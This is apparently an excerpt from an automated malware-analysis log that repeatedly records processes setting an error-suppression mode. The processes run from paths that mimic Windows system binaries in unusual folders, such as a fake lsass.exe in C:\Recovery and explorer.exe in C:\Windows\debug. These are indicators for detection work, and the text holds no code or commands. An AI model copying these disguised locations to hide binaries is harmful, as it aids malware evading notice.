                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
